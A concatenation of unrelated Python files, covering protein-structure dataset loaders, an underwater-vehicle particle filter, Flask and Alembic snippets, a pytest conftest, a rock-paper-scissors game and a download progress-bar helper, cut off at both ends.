self.data_dir = data_dir
self.return_msa = return_msa
self.bin = bin
self.max_len = max_len
if untokenize:
self.tokenizer = Tokenizer(trR_ALPHABET)
else:
self.tokenizer = None
def __len__(self):
return len(self.filenames)
def __getitem__(self, idx):
filename = self.data_dir + 'npz/' + self.filenames[idx] + '.npz'
data = np.load(filename)
if self.return_msa:
s = torch.tensor(data['msa'])
ell = s.shape[1]
else:
s = data['msa'][0]
if self.tokenizer is not None:
s = self.tokenizer.untokenize(s)
ell = len(s)
if ell - self.max_len > 0:
start = np.random.choice(ell - self.max_len)
stop = start + self.max_len
else:
start = 0
stop = ell
dist = data['dist6d']
omega = data['omega6d']
theta = data['theta6d']
phi = data['phi6d']
if self.return_msa:
s = s[:, start:stop]
else:
s = s[start:stop]
if self.bin:
dist, omega, theta, phi = trr_bin(dist, omega, theta, phi)
else:
idx = np.where(dist == 0)
dist[idx] = 20.0
dist = torch.tensor(dist).float()
omega = torch.tensor(omega).float()
theta = torch.tensor(theta).float()
phi = torch.tensor(phi).float()
dist = dist[start:stop, start:stop]
omega = omega[start:stop, start:stop]
theta = theta[start:stop, start:stop]
phi = phi[start:stop, start:stop]
return s, dist, omega, theta, phi
class MSAGapDataset(Dataset):
"""Build dataset for trRosetta data: gap-prob and lm/mlm"""
def __init__(self, data_dir, dataset, task, pdb=False, y=None, msa=None,
random_seq=False, npz_dir=None, reweight=True, mask_endgaps=False):
"""
Args:
data_dir: str,
path to trRosetta data
dataset: str,
train, valid, or test
task: str,
gap-prob or lm
pdb: bool,
if True, return structure as inputs; if False, return random sequence
if pdb is False, you must have task = gab-prob
filtered_y: bool,
if True, use gap probabilities from filtered MSA (task = gap-prob)
or select sequence from filtered MSA (task = lm)
if False, use unfiltered MSA
Filtered is defined as removing sequences from MSA where gaps only
exists on ends of sequences
filtered_msa: bool,
if True, use filtered msa; if False, use unfiltered msa
npz_dir: str,
if you have a specified npz directory
pdb_dir: str,
if you have a specified pdb directory
"""
filename = data_dir + dataset + 'list.txt'
pdb_ids = np.loadtxt(filename, dtype=str)
# choose to use specific msa or y instead of the prebuilt ones
# should be in the order of npz_dir and in npy file
self.msa_path = msa
self.y_path = y
# get data dir
if npz_dir:
self.npz_dir = npz_dir
else:
self.npz_dir = data_dir + 'structure/'
all_npzs = os.listdir(self.npz_dir)
selected_npzs = [i for i in pdb_ids if i + '.npz' in all_npzs]
self.filenames = selected_npzs # ids of samples to include
# X options
self.pdb = pdb
self.task = task
self.random_seq = random_seq
# special options for generating y values
self.reweight = reweight
self.mask_endgaps = mask_endgaps
def __len__(self):
return len(self.filenames)
def __getitem__(self, idx):
filename = self.filenames[idx]
data = np.load(self.npz_dir + filename + '.npz')
# grab sequence info
if self.msa_path is not None:
msa_data = np.load(self.msa_path + filename + ".npz")
msa = msa_data['msa']
weights = msa_data['weights']
else:
msa = data['msa']
weights = data['weights']
anchor_seq = msa[0]
if self.random_seq:
flag = True
while flag:
random_idx = np.random.randint(0, len(msa))
base_seq = msa[random_idx]
if (base_seq == 20).sum()/len(base_seq) < 0.20:
flag = False
else:
base_seq = anchor_seq
# choose y type
if self.y_path is not None:
y_data = np.load(self.y_path + filename + 'npz')
y = y_data['y']
y_mask = y_data['y_mask']
elif self.task == "gap-prob":
if self.reweight: # downsampling
y = ((msa == 20) * weights.T).sum(0)/msa.shape[0]
y = torch.FloatTensor(y)
else:
y = torch.FloatTensor(np.sum(msa == 20, axis=0) / msa.shape[0])
y_mask = None
else: # lm
# y, y_mask = self._get_lm_y(msa)
y = torch.LongTensor(base_seq)
y_mask = None
# choose X type
if self.pdb: # use structure for X
dist = torch.FloatTensor(data['dist'])
omega = torch.FloatTensor(data['omega'])
theta = torch.FloatTensor(data['theta'])
phi = torch.FloatTensor(data['phi'])
base_seq = torch.LongTensor(base_seq)
anchor_seq = torch.LongTensor(anchor_seq)
return base_seq, anchor_seq, dist, omega, theta, phi, y, y_mask
else: # use just seq for X (THIS IS ONLY USED FOR GAP PROB)
if self.task == "gap-prob":
chosen = False
while not chosen:
msa_num = np.random.randint(msa.shape[0])
x = msa[msa_num]
seq_mask = x != 20
# only want num of gap < 20%
chosen = np.sum(seq_mask) / x.shape[0] > 0.8
x = torch.LongTensor(x)
seq_mask = torch.BoolTensor(seq_mask)
return x[seq_mask], y[seq_mask]
else:
raise ValueError("""Warning - input type and output type are not compatible,
pdb=False can only be used with task gap-prob""")
def _get_lm_y(self, msa):
if self.mask_endgaps:
y = torch.LongTensor(msa[np.random.choice(msa.shape[0])]) # get random seq from msa
y_mask = []
for i in range(len(y)):
if y[i] != 20:
y_mask += [False] * (i)
break
for j in range(len(y) - 1, -1, -1):
if y[j] != 20:
y_mask += [True] * (j - i + 1)
y_mask += [False] * (len(y) - 1 - j)
break
return y, torch.BoolTensor(y_mask)
else:
y = torch.LongTensor(msa[np.random.choice(msa.shape[0])]) # get random seq from msa
y_mask = None
return y, y_mask
|
#
# Copyright (C) 2020 GreenWaves Technologies
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import gsystree as st
class Apb_soc_ctrl(st.Component):
def __init__(self, parent, name, soc):
super(Apb_soc_ctrl, self).__init__(parent, name)
self.add_properties({
'vp_component': 'pulp.chips/gap9_v2/apb_soc_impl',
'cluster_power_event': soc.get_property('soc_events/soc_evt_cluster_pok'),
'cluster_clock_gate_event': soc.get_property('soc_events/soc_evt_cluster_cg_ok')
})
self.add_properties(soc.get_property('peripherals/apb_soc_ctrl/config'))
|
from .alexa import AlexaResponse
|
# -*- coding: utf-8 -*-
"""
Copyright (c) 2020, University of Southampton
All rights reserved.
Licensed under the BSD 3-Clause License.
See LICENSE.md file in the project root for full license information.
"""
import copy
import math
import numpy as np
from numpy.random import randn, uniform
from auv_nav.sensors import SyncedOrientationBodyVelocity
from auv_nav.tools.interpolate import interpolate
from oplab import Console
# Particle Filter implementation using classes
# TODO: multiprocessing or multithreading
# TODO: port uncertainty calculation from Jim
# TODO: use 3D gaussian models for USBL
def gaussian_pdf(mu, sigma, x):
num = -((mu - x) ** 2) / (sigma ** 2) / 2.0
den = math.sqrt(2.0 * math.pi * (sigma ** 2))
return math.exp(num) / den
class Index:
X = 0
Y = 1
Z = 2
ROLL = 3
PITCH = 4
YAW = 5
VX = 6
VY = 7
VZ = 8
ALT = 9
DIM = 10
class Particle:
def __init__(self):
# The real-valued time, in seconds, since some epoch
self.time = None
# A 11-dimensional state vector
self.state = np.zeros((Index.DIM, 1), dtype=float)
# The particle trajectory
self.trajectory = []
self.trajectory_time = []
# The measured errors during PF
self.trajectory_error = []
# Particle weight
self.weight = None
@property
def eastings(self):
return self.state[Index.Y, 0]
@property
def northings(self):
return self.state[Index.X, 0]
def __eq__(self, other):
return self.weight == other.weight
def __lt__(self, other):
return self.weight < other.weight
class UsblObservationModel:
def __init__(self, usbl_noise_sigma_factor):
# The measurement
self.x = None
self.y = None
self.z = None
self.std = None
self.usbl_noise_sigma_factor = usbl_noise_sigma_factor
def set_observation(self, value):
self.x = value.northings
self.y = value.eastings
self.z = value.depth
# TODO: Could we use a 3D Gaussian instead of a 1D?
sigma = math.sqrt(
value.northings_std ** 2
+ value.eastings_std ** 2
+ value.depth_std ** 2
)
self.std = self.usbl_noise_sigma_factor * sigma
def measure(self, p):
"""
This is the main method of ObservationModel. It takes a state reference
as argument and is supposed to extract the state's variables to compute
an importance weight for the state.
Define this method in your sub-class!
@param state Reference to the state that has to be weightened.
@return importance weight for the state (positive, non-zero value).
"""
weight = 1.0
if self.x is not None:
dist = math.sqrt(
(self.x - p.state[Index.X, 0]) ** 2
+ (self.y - p.state[Index.Y, 0]) ** 2
+ (self.z - p.state[Index.Z, 0]) ** 2
)
p.trajectory_error.append(dist)
weight = gaussian_pdf(0, self.std, dist)
return weight
class DeadReckoningMovementModel:
"""
@class MovementModel
@brief Interface for movement models for particle filters.
The movement model in a particle filter defines how a particle's state
changes over time.
"""
def __init__(
self, sensors_std, dvl_noise_sigma_factor, imu_noise_sigma_factor
):
self.sensors_std = sensors_std
self.dvl_noise_sigma_factor = dvl_noise_sigma_factor
self.imu_noise_sigma_factor = imu_noise_sigma_factor
self.movement = np.zeros((Index.DIM, 1), dtype=float)
def set_movement(self, value):
self.movement[Index.Z, 0] = value.depth
self.movement[Index.ROLL, 0] = value.roll * math.pi / 180.0
self.movement[Index.PITCH, 0] = value.pitch * math.pi / 180.0
self.movement[Index.YAW, 0] = value.yaw * math.pi / 180.0
self.movement[Index.VX, 0] = value.x_velocity
self.movement[Index.VY, 0] = value.y_velocity
self.movement[Index.VZ, 0] = value.z_velocity
self.movement[Index.ALT, 0] = value.altitude
def propagate(self, p, dt):
"""
This is the main method of MovementModel. It takes a state reference as
argument and is supposed to extract the state's variables and
manipulate them. dt means delta t and defines the time in seconds that
has passed since the last filter update.
@param state Reference to the state that has to be manipulated.
@param dt time that has passed since the last filter update in seconds.
"""
depth_std_factor = self.sensors_std["position_z"]["factor"]
depth_std_offset = self.sensors_std["position_z"]["offset"]
velocity_std_factor = self.sensors_std["speed"]["factor"]
velocity_std_offset = self.sensors_std["speed"]["offset"]
imu_noise_std_offset = self.sensors_std["orientation"]["offset"]
imu_noise_std_factor = self.sensors_std["orientation"]["factor"]
k_dvl = self.dvl_noise_sigma_factor
k_imu = self.imu_noise_sigma_factor
def linear_noise(idx, factor, offset, gain=1.0):
return (
self.movement[idx, 0]
+ randn() * (self.movement[idx, 0] * factor + offset) * gain
)
# Propagate all states except for X and Y
p.state[Index.Z, 0] = linear_noise(
Index.Z, depth_std_factor, depth_std_offset
)
p.state[Index.ROLL, 0] = linear_noise(
Index.ROLL, imu_noise_std_factor, imu_noise_std_offset, k_imu
)
p.state[Index.PITCH, 0] = linear_noise(
Index.PITCH, imu_noise_std_factor, imu_noise_std_offset, k_imu
)
p.state[Index.YAW, 0] = linear_noise(
Index.YAW, imu_noise_std_factor, imu_noise_std_offset, k_imu
)
p.state[Index.VX, 0] = linear_noise(
Index.VX, velocity_std_factor, velocity_std_offset, k_dvl
)
p.state[Index.VY, 0] = linear_noise(
Index.VY, velocity_std_factor, velocity_std_offset, k_dvl
)
p.state[Index.VZ, 0] = linear_noise(
Index.VZ, velocity_std_factor, velocity_std_offset, k_dvl
)
cr = math.cos(p.state[Index.ROLL, 0])
sr = math.sin(p.state[Index.ROLL, 0])
cp = math.cos(p.state[Index.PITCH, 0])
sp = math.sin(p.state[Index.PITCH, 0])
cy = math.cos(p.state[Index.YAW, 0])
sy = math.sin(p.state[Index.YAW, 0])
f = np.eye(Index.DIM, dtype=float)
f[Index.X, Index.VX] = cy * cp * dt
f[Index.X, Index.VY] = (cy * sp * sr - sy * cr) * dt
f[Index.X, Index.VZ] = (cy * sp * cr + sy * sr) * dt
f[Index.Y, Index.VX] = sy * cp * dt
f[Index.Y, Index.VY] = (sy * sp * sr + cy * cr) * dt
f[Index.Y, Index.VZ] = (sy * sp * cr - cy * sr) * dt
f[Index.Z, Index.VX] = -sp * dt
f[Index.Z, Index.VY] = cp * sr * dt
f[Index.Z, Index.VZ] = cp * cr * dt
# Propagate the p.state forward
p.state = f @ p.state
p.time += dt
p.trajectory.append(p.state)
p.trajectory_time.append(p.time)
class ParticleFilter:
def __init__(
self,
num_particles,
movement_model,
observation_model,
expected_iterations=0,
):
self.particles = [Particle()] * num_particles
self.particles_history = []
self.iteration = 0
self.iteration_step = int(float(expected_iterations) / 20.0)
self.mm = movement_model
self.om = observation_model
for p in self.particles:
p.weight = 1.0 / float(num_particles)
self.particles_history.append(self.particles)
def __str__(self):
a = (
"Particle Filter with "
+ str(len(self.particles))
+ " particles.\n"
)
for i, p in enumerate(self.particles):
a += " Particle " + str(i) + "\n"
a += (
" (x, y, theta) = ("
+ str(p.x)
+ ", "
+ str(p.y)
+ ", "
+ str(p.theta)
+ ")\n"
)
a += " w = " + str(p.weight) + "\n"
return a
def set_prior(self, prior):
for i in range(len(self.particles)):
self.particles[i] = copy.deepcopy(prior)
self.particles[i].weight = 1.0 / float(len(self.particles))
def set_observation(self, value):
self.om.set_observation(value)
def set_movement(self, value):
self.mm.set_movement(value)
def should_resample(self):
return self.get_neff() < (len(self.particles) / 2.0)
def propagate(self, dt):
for p in self.particles:
self.mm.propagate(p, dt)
if self.iteration == self.iteration_step:
self.particles_history.append(copy.deepcopy(self.particles))
self.iteration = 0
self.iteration += 1
def measure(self):
for p in self.particles:
p.weight *= self.om.measure(p)
self.particles.sort(reverse=True)
self.normalize()
def normalize(self):
s = [p.weight for p in self.particles]
norm = np.sum(s)
# Avoid division by zero
if norm < 1e-20:
norm += 1e-20
for p in self.particles:
p.weight = p.weight / norm
def resample(self):
""" Importance resample """
inverse_num = 1.0 / len(self.particles)
# random start in CDF
start = uniform() * inverse_num
cumulative_weight = 0.0
# index to draw from
source_index = 0
cumulative_weight += self.particles[source_index].weight
new_particles = [None] * len(self.particles)
for dest_index, p in enumerate(self.particles):
# amount of cumulative weight to reach
prob_sum = start + inverse_num * dest_index
# sum weights until
while prob_sum > cumulative_weight:
source_index += 1
if source_index >= len(self.particles):
source_index = len(self.particles) - 1
break
# target sum reached
cumulative_weight += self.particles[source_index].weight
# copy particle (via assignment operator)
new_particles[dest_index] = copy.deepcopy(
self.particles[source_index]
)
# Update the particle list
self.particles = new_particles
def get_neff(self):
""" Returns the number of effective particles """
weights = [p.weight for p in self.particles]
return 1.0 / np.sum(np.square(weights))
def ParticleToSyncedOrientationBodyVelocity(p):
sobv_list = []
for t, x in zip(p.trajectory_time, p.trajectory):
m = SyncedOrientationBodyVelocity()
m.epoch_timestamp = t
m.northings = x[Index.X, 0]
m.eastings = x[Index.Y, 0]
m.depth = x[Index.Z, 0]
m.roll = x[Index.ROLL, 0] * 180.0 / math.pi
m.pitch = x[Index.PITCH, 0] * 180.0 / math.pi
m.yaw = x[Index.YAW, 0] * 180.0 / math.pi
m.x_velocity = x[Index.VX, 0]
m.y_velocity = x[Index.VY, 0]
m.z_velocity = x[Index.VZ, 0]
m.altitude = x[Index.ALT, 0]
sobv_list.append(m)
return sobv_list
def get_prior(dr_list, usbl_list):
dr_index = 0
# Interpolate DR to USBL updates
dr_eastings = []
dr_northings = []
for i in range(len(usbl_list)):
usbl_t = usbl_list[i].epoch_timestamp
dr_t = dr_list[dr_index + 1].epoch_timestamp
while dr_index < len(dr_list) - 2 and usbl_t > dr_t:
usbl_t = usbl_list[i].epoch_timestamp
dr_t = dr_list[dr_index + 1].epoch_timestamp
dr_index += 1
dr_eastings.append(
interpolate(
usbl_list[i].epoch_timestamp,
dr_list[dr_index].epoch_timestamp,
dr_list[dr_index + 1].epoch_timestamp,
dr_list[dr_index].eastings,
dr_list[dr_index + 1].eastings,
)
)
dr_northings.append(
interpolate(
usbl_list[i].epoch_timestamp,
dr_list[dr_index].epoch_timestamp,
dr_list[dr_index + 1].epoch_timestamp,
dr_list[dr_index].northings,
dr_list[dr_index + 1].northings,
)
)
usbl_eastings = [i.eastings for i in usbl_list]
usbl_northings = [i.northings for i in usbl_list]
eastings_error = [y - x for x, y in zip(dr_eastings, usbl_eastings)]
northings_error = [y - x for x, y in zip(dr_northings, usbl_northings)]
eastings_mean = np.mean(eastings_error)
northings_mean = np.mean(northings_error)
dr_index = 0
usbl_index = 0
usbl_t = usbl_list[usbl_index].epoch_timestamp
dr_t = dr_list[usbl_index].epoch_timestamp
while dr_index < len(dr_list) and usbl_t > dr_t:
usbl_t = usbl_list[usbl_index].epoch_timestamp
dr_t = dr_list[usbl_index].epoch_timestamp
dr_index += 1
while usbl_index < len(usbl_list) and usbl_t < dr_t:
usbl_t = usbl_list[usbl_index].epoch_timestamp
dr_t = dr_list[usbl_index].epoch_timestamp
usbl_index += 1
# Fix DR to index zero
dr_index = 0
# Build state from first known USBL and DR, and use that displacement
# error at the start of DR.
x = dr_list[dr_index].northings + northings_mean
y = dr_list[dr_index].eastings + eastings_mean
z = dr_list[dr_index].depth
alt = dr_list[dr_index].altitude
roll = dr_list[dr_index].roll * math.pi / 180.0
pitch = dr_list[dr_index].pitch * math.pi / 180.0
heading = dr_list[dr_index].yaw * math.pi / 180.0
vx = dr_list[dr_index].x_velocity
vy = dr_list[dr_index].y_velocity
vz = dr_list[dr_index].z_velocity
prior = Particle()
prior.state = np.array(
[
[x - northings_mean],
[y - eastings_mean],
[z],
[roll],
[pitch],
[heading],
[vx],
[vy],
[vz],
[alt],
]
)
prior.time = dr_list[0].epoch_timestamp
return prior, dr_index, usbl_index
def run_particle_filter(
usbl_list,
dr_list,
num_particles,
sensors_std,
dvl_noise_sigma_factor,
imu_noise_sigma_factor,
usbl_noise_sigma_factor,
measurement_update_flag=True,
):
"""Execute the particle filter over the dataset
Args:
usbl_list (list): List of USBL measurements
dr_list (list): List of DR measurements
num_particles (int): Number of particles
sensors_std (list): List of sensors standard deviations
dvl_noise_sigma_factor (float): DVL noise std multiplication factor
imu_noise_sigma_factor (float): IMU noise std multiplication factor
usbl_noise_sigma_factor (float): USBL noise std multiplication factor
measurement_update_flag (bool, optional): Whether to perform updates
or not.
Returns:
List: List containing at position
0: Output PF localisation
1: USBL data points used in updates
2: List of particles over time
3: Northings STD
4: Eastings STD
5: Yaw STD
"""
Console.info("Running Particle Filter with:")
Console.info("\t* Number of particles: {}".format(num_particles))
Console.info(
"\t* DVL noise std: f(x)={}x+{} m/s".format(
sensors_std["speed"]["factor"], sensors_std["speed"]["offset"]
)
)
Console.info(
"\t* IMU noise std: f(x)={}x+{} deg".format(
sensors_std["orientation"]["factor"],
sensors_std["orientation"]["offset"],
)
)
Console.info(
"\t* Depth noise std: f(x)={}x+{} meters".format(
sensors_std["position_z"]["factor"],
sensors_std["position_z"]["offset"],
)
)
Console.info(
"\t* USBL noise std: f(x)={}x+{} meters".format(
sensors_std["position_xy"]["factor"],
sensors_std["position_xy"]["offset"],
)
)
Console.info("Running {} iterations...".format(len(dr_list)))
prior, dr_idx, usbl_idx = get_prior(dr_list, usbl_list)
om = UsblObservationModel(usbl_noise_sigma_factor)
mm = DeadReckoningMovementModel(
sensors_std, dvl_noise_sigma_factor, imu_noise_sigma_factor
)
pf = ParticleFilter(
num_particles, mm, om, expected_iterations=len(dr_list)
)
pf.set_prior(prior)
last_t = dr_list[dr_idx].epoch_timestamp
resampled_usbl_list = []
# Loop through all DR
while dr_idx < len(dr_list):
Console.progress(dr_idx, len(dr_list))
dr_stamp = dr_list[dr_idx].epoch_timestamp
if usbl_idx < len(usbl_list):
usbl_stamp = usbl_list[usbl_idx].epoch_timestamp
else:
# Fake a posterior USBL measurement to force PF to read DR
usbl_stamp = dr_stamp + 1
if dr_stamp < usbl_stamp:
# Compute delta t
dt = dr_list[dr_idx].epoch_timestamp - last_t
# Set the current movement
pf.set_movement(dr_list[dr_idx])
# and propagate the filter
pf.propagate(dt)
last_t = dr_list[dr_idx].epoch_timestamp
dr_idx += 1
elif usbl_idx < len(usbl_list):
# Compute delta t
dt = usbl_list[usbl_idx].epoch_timestamp - last_t
# Set the measurement
pf.set_observation(usbl_list[usbl_idx])
# Propagate
pf.propagate(dt)
# And measure. Resample if NEFF > 0.5
pf.measure()
if pf.should_resample():
pf.resample()
resampled_usbl_list.append(usbl_list[usbl_idx])
last_t = usbl_list[usbl_idx].epoch_timestamp
usbl_idx += 1
# Find best particle
best_particle = pf.particles[0]
# Extract trajectory from it
pf_list = ParticleToSyncedOrientationBodyVelocity(best_particle)
# Get remaining bits
particles_list = pf.particles_history
# TODO: Compute std
northings_std = []
eastings_std = []
yaw_std = []
print("Resampled {} times.".format(len(resampled_usbl_list)))
return [
pf_list,
resampled_usbl_list,
particles_list,
northings_std,
eastings_std,
yaw_std,
]
|
"""docstring for run.py app import create_app."""
import os
from app import create_app
config_name = os.getenv("FLASK_ENV")
app = create_app(config_name)
if __name__ == "__main__":
app.run(threaded=True)
|
import math
from flask import url_for
from newsapp.models.article import Article
def pagination(category: str, number: int) -> dict:
page_count = Article.page_count(category)
out = {}
if number == 1:
out["prev"] = ""
out["labels"] = [
(i, url_for("main.news", category=category, number=i)) for i in range(1, 4)
]
out["next"] = url_for("main.news", category=category, number=number + 1)
elif number == page_count:
out["prev"] = url_for("main.news", category=category, number=number - 1)
out["labels"] = [
(i, url_for("main.news", category=category, number=i))
for i in range(number - 2, number + 1)
]
out["next"] = ""
else:
out["prev"] = url_for("main.news", category=category, number=number - 1)
out["labels"] = [
(i, url_for("main.news", category=category, number=i))
for i in range(number - 1, number + 2)
]
out["next"] = url_for("main.news", category=category, number=number + 1)
return out
|
"""database permission
Revision ID: 50db531bbf54
Revises: 822b8de2c260
Create Date: 2016-08-01 11:50:51.872278
"""
# revision identifiers, used by Alembic.
revision = '50db531bbf54'
down_revision = '822b8de2c260'
branch_labels = None
depends_on = None
from alembic import op
def upgrade():
op.execute("GRANT SELECT ON ALL TABLES IN SCHEMA public TO public;")
def downgrade():
pass
|
"""
This file is part of a simple toy neural network library.
Author: Marcel Moosbrugger
"""
import numpy as np
from simple_deep_learning.Layer import Layer
class OutputLayer(Layer):
def feed_forward(self, inputs):
self.last_inputs = inputs + self.biases
self.last_outputs = self.activation(self.last_inputs)
def get_outputs(self):
return self.last_outputs
# logistic activation function for output layer
def activation(self, x):
return 1 / (1 + np.exp(-x))
def dactivation(self, x):
return self.activation(x) * (1 - self.activation(x))
|
import pytest
from .helpers import (
assert_equal_query,
PandasBackend,
SqlBackend,
CloudBackend,
BigqueryBackend,
data_frame
)
def pytest_addoption(parser):
parser.addoption(
"--dbs", action="store", default="sqlite", help="databases tested against (comma separated)"
)
params_backend = [
pytest.param(lambda: SqlBackend("postgresql"), id = "postgresql", marks=pytest.mark.postgresql),
pytest.param(lambda: SqlBackend("mysql"), id = "mysql", marks=pytest.mark.mysql),
pytest.param(lambda: SqlBackend("sqlite"), id = "sqlite", marks=pytest.mark.sqlite),
pytest.param(lambda: BigqueryBackend("bigquery"), id = "bigquery", marks=pytest.mark.bigquery),
pytest.param(lambda: CloudBackend("snowflake"), id = "snowflake", marks=pytest.mark.snowflake),
pytest.param(lambda: PandasBackend("pandas"), id = "pandas", marks=pytest.mark.pandas)
]
@pytest.fixture(params = params_backend, scope = "session")
def backend(request):
return request.param()
@pytest.fixture
def skip_backend(request, backend):
if request.node.get_closest_marker('skip_backend'):
mark_args = request.node.get_closest_marker('skip_backend').args
if backend.name in mark_args:
pytest.skip('skipped on backend: {}'.format(backend.name))
@pytest.fixture
def xfail_backend(request, backend):
if request.node.get_closest_marker('xfail_backend'):
mark_args = request.node.get_closest_marker('xfail_backend').args
if backend.name in mark_args:
pytest.xfail()
|
import random
def play_game(choice):
choices = ["rock", "paper", "scissor"]
comp_choice = choices[random.randint(0,2)]
player_choice = str(choice).lower()
while True:
if player_choice == comp_choice:
print(f"Its a draw ..{player_choice} vs {comp_choice}!!")
return
elif player_choice == "rock" and comp_choice == "paper":
print(f"You lose...{player_choice} gets covered by {comp_choice}")
return
elif player_choice == "rock" and comp_choice == "scissor":
print(f"You win...{player_choice} smashes {comp_choice}")
return
elif player_choice == "scissor" and comp_choice == "paper":
print(f"You win...{player_choice} cuts {comp_choice}")
return
elif player_choice == "scissor" and comp_choice == "rock":
print(f"You lose...{player_choice} gets smashed by {comp_choice}")
return
elif player_choice == "paper" and comp_choice == "rock":
print(f"You win ...{player_choice} covers {comp_choice}")
return
elif player_choice == "paper" and comp_choice == "scissor":
print(f"You lose...{player_choice} gets cut by {comp_choice}")
return
else:
print("Please enter rock, paper, or scissor")
def main():
choice = str(input("Choose rock, paper, or scissor: "))
play_game(choice)
play_again = True
while play_again:
play_again_input = input("Do you want to play again (y/n)? ").lower()
while play_again_input not in ("y", "n"):
play_again_input = input("Invalid Answer, Please Type 'y' or 'n'? ").lower()
if play_again_input == "n":
print("OK ...BYE BYE!!")
return
else:
main ()
if __name__ == "__main__":
main()
# # guess the number
# import random
# def play_game(max_number):
# random_number = random.randint(0, max_number)
# guess = int(input(f"Guess A Number Between 0 and {max_number}: "))
# count = 1
# while True:
# if guess > random_number:
# guess = int(input("Too High! Guess Again: "))
# count += 1
# elif guess < random_number:
# guess = int(input("Too Low! Guess Again: "))
# count += 1
# else:
# print(f"You Got It In {count} Guesses!")
# return count
# def main():
# guesses = []
# play_again = True
# while play_again:
# max_number = int(input("Pick a max number: "))
# guesses.append(play_game(max_number))
# play_again_input = input("Do you want to play again (y/n)? ").lower()
# while play_again_input not in ("y", "n"):
# play_again_input = input("Invalid Answer, Please Type 'y' or 'n'? ").lower()
# if play_again_input == "n":
# print(f"The Max Number Of Guesses Was: {max(guesses)}")
# print(f"The Min Number Of Guesses Was: {min(guesses)}")
# print(f"The Average Number Of Guesses Was: {sum(guesses)/len(guesses)}")
# return
# else:
# continue
# if __name__ == "__main__":
# main()
|
#!/usr/bin/env python
from __future__ import print_function, absolute_import, division
# -*- coding: utf-8 -*-
"""
Copyright (c) 2011, Kenneth Reitz <me@kennethreitz.com>
Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted, provided that the above
copyright notice and this permission notice appear in all copies.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
clint.textui.progress
~~~~~~~~~~~~~~~~~
This module provides the progressbar functionality.
"""
from collections import OrderedDict
from os import path
import glob
import os
import sys
import tarfile
import time
import zipfile
import yaml
try:
import requests
except ImportError:
print('this download script requires the requests module: conda install requests')
sys.exit(1)
STREAM = sys.stderr
BAR_TEMPLATE = '%s[%s%s] %i/%i - %s\r'
MILL_TEMPLATE = '%s %s %i/%i\r'
DOTS_CHAR = '.'
BAR_FILLED_CHAR = '#'
BAR_EMPTY_CHAR = ' '
MILL_CHARS = ['|', '/', '-', '\\']
# How long to wait before recalculating the ETA
ETA_INTERVAL = 1
# How many intervals (excluding the current one) to calculate the simple moving
# average
ETA_SMA_WINDOW = 9
class Bar(object):
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.done()
return False # we're not suppressing exceptions
def __init__(self, label='', width=32, hide=None, empty_char=BAR_EMPTY_CHAR,
filled_char=BAR_FILLED_CHAR, expected_size=None, every=1):
'''Bar is a class for printing the status of downloads'''
self.label = label
self.width = width
self.hide = hide
# Only show bar in terminals by default (better for piping, logging etc.)
if hide is None:
try:
self.hide = not STREAM.isatty()
except AttributeError: # output does not support isatty()
self.hide = True
self.empty_char = empty_char
self.filled_char = filled_char
self.expected_size = expected_size
self.every = every
self.start = time.time()
self.ittimes = []
self.eta = 0
self.etadelta = time.time()
self.etadisp = self.format_time(self.eta)
self.last_progress = 0
if (self.expected_size):
self.show(0)
def show(self, progress, count=None):
if count is not None:
self.expected_size = count
if self.expected_size is None:
raise Exception("expected_size not initialized")
self.last_progress = progress
if (time.time() - self.etadelta) > ETA_INTERVAL:
self.etadelta = time.time()
self.ittimes = \
self.ittimes[-ETA_SMA_WINDOW:] + \
[-(self.start - time.time()) / (progress+1)]
self.eta = \
sum(self.ittimes) / float(len(self.ittimes)) * \
(self.expected_size - progress)
self.etadisp = self.format_time(self.eta)
x = int(self.width * progress / self.expected_size)
if not self.hide:
if ((progress % self.every) == 0 or # True every "every" updates
(progress == self.expected_size)): # And when we're done
STREAM.write(BAR_TEMPLATE % (
self.label, self.filled_char * x,
self.empty_char * (self.width - x), progress,
self.expected_size, self.etadisp))
STREAM.flush()
def done(self):
self.elapsed = time.time() - self.start
elapsed_disp = self.format_time(self.elapsed)
if not self.hide:
# Print completed bar with elapsed time
STREAM.write(BAR_TEMPLATE % (
self.label, self.filled_char * self.width,
self.empty_char * 0, self.last_progress,
self.expected_size, elapsed_disp))
STREAM.write('\n')
STREAM.flush()
def format_time(self, seconds):
return time.strftime('%H:%M:%S', time.gmtime(seconds))
def bar(it, label='', width=32, hide=None, empty_char=BAR_EMPTY_CHAR,
filled_char=BAR_FILLED_CHAR, expected_size=None, every=1):
"""Progress iterator. Wrap your iterables with it."""
count = len(it) if expected_size is None else expected_size
with Bar(label=label, width=width, hide=hide, empty_char=BAR_EMPTY_CHAR,
filled_char=BAR_FILLED_CHAR, expected_size=count, every=every) \
as bar:
for i, item in enumerate(it):
yield item
bar.show(i + 1)
def ordered_load(stream, Loader=yaml.Loader, object_pairs_hook=OrderedDict):
class OrderedLoader(Loader):
pass
def construct_mapping(loader, node):
loader.flatten_mapping(node)
return object_pairs_hook(loader.construct_pairs(node))
OrderedLoader.add_constructor(
yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG,
construct_mapping)
return yaml.load(stream, OrderedLoader)
class DirectoryContext(object):
"""
Context Manager for changing directories
"""
def __init__(self, path):
self.old_dir = os.getcwd()
self.new_dir = path
def __enter__(self):
os.chdir(self.new_dir)
def __exit__(self, *args):
os.chdir(self.old_dir)
def _url_to_binary_write(url, output_path, title):
'''Given a url, output_path and title,
write the contents of a requests get operation to
the url in binary mode and print the title of operation'''
